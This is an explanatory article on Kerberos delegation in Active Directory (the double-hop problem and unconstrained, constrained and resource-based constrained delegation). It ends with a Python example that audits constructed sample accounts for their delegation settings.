Delegation
Access tokens represent the local security context of a user. They are cached in LSASS (the Local Security Authority Subsystem Service) and are tied to a logon session's ID, so both the access token and the logon session exist on the same host (Figure 1).
Credentials represent the network security context of a user (password hashes, Kerberos tickets, etc.) and are also tied to a logon session. Thus, if a user authenticates to an application with its access token and the application then needs to authenticate to a remote server on the user's behalf, the double hop problem arises: the application holds the user's local token but not the credentials needed for the second hop (Figure 2).
Delegation aims to solve the double hop problem by allowing services to impersonate users not only locally but also across the network. In brief, the user sends its "whole" credentials to the server, which results in much the same situation as if the user and the server resided on the same host (Figure 3).
Kerberos delegation allows services to impersonate domain users in order to access another service, and comes in three types:
Unconstrained Delegation (UD)
Constrained Delegation (CD)
Resource-Based Constrained Delegation (RBCD)
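Each of the three types is recorded differently in Active Directory, and an audit of which accounts are allowed to delegate is the first thing a defender wants from this material. The following is an added example, not code from the original page: it classifies account entries by delegation type from the documented userAccountControl bits and the msDS-AllowedToDelegateTo / msDS-AllowedToActOnBehalfOfOtherIdentity attributes, and also reports accounts marked "sensitive and cannot be delegated". The entries are constructed sample data, not output from a real domain.

```python
# Added example: classify AD accounts by Kerberos delegation type.
# Flag values are the documented userAccountControl bits.
TRUSTED_FOR_DELEGATION = 0x80000            # Unconstrained delegation (UD)
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # CD with protocol transition ("use any auth protocol")
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"


def classify_delegation(entry):
    """Return the delegation types configured on one LDAP entry (a dict).

    Keys used: userAccountControl (int), msDS-AllowedToDelegateTo (list of
    SPNs; constrained delegation) and msDS-AllowedToActOnBehalfOfOtherIdentity
    (security descriptor bytes; RBCD, set on the *resource* being accessed).
    """
    uac = entry.get("userAccountControl", 0)
    kinds = []
    if uac & TRUSTED_FOR_DELEGATION:
        kinds.append("UD")
    if entry.get("msDS-AllowedToDelegateTo"):
        # Protocol transition lets the service obtain tickets for users who never
        # authenticated to it with Kerberos, so it is flagged separately.
        kinds.append("CD (protocol transition)" if uac & TRUSTED_TO_AUTH_FOR_DELEGATION else "CD")
    if entry.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
        kinds.append("RBCD")
    return kinds


def is_protected_from_delegation(entry):
    """True when the account cannot be delegated (NOT_DELEGATED bit set)."""
    return bool(entry.get("userAccountControl", 0) & NOT_DELEGATED)


def audit(entries):
    """Map sAMAccountName -> delegation types for every entry that has any."""
    return {e["sAMAccountName"]: classify_delegation(e) for e in entries if classify_delegation(e)}


# Constructed sample entries (0x1000 = WORKSTATION_TRUST_ACCOUNT, 0x200 = NORMAL_ACCOUNT).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1000 | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x200 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/FILE01.corp.example", "MSSQLSvc/DB01.corp.example:1433"]},
    {"sAMAccountName": "FILE01$", "userAccountControl": 0x1000,
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},  # placeholder SD bytes
    {"sAMAccountName": "admin", "userAccountControl": 0x200 | NOT_DELEGATED},
]

if __name__ == "__main__":
    for name, kinds in audit(SAMPLE_ENTRIES).items():
        print(f"{name}: {', '.join(kinds)}")
```

Note that RBCD shows up on the resource (FILE01$ above), so the accounts permitted to impersonate users against it must be read from the security descriptor stored in that attribute.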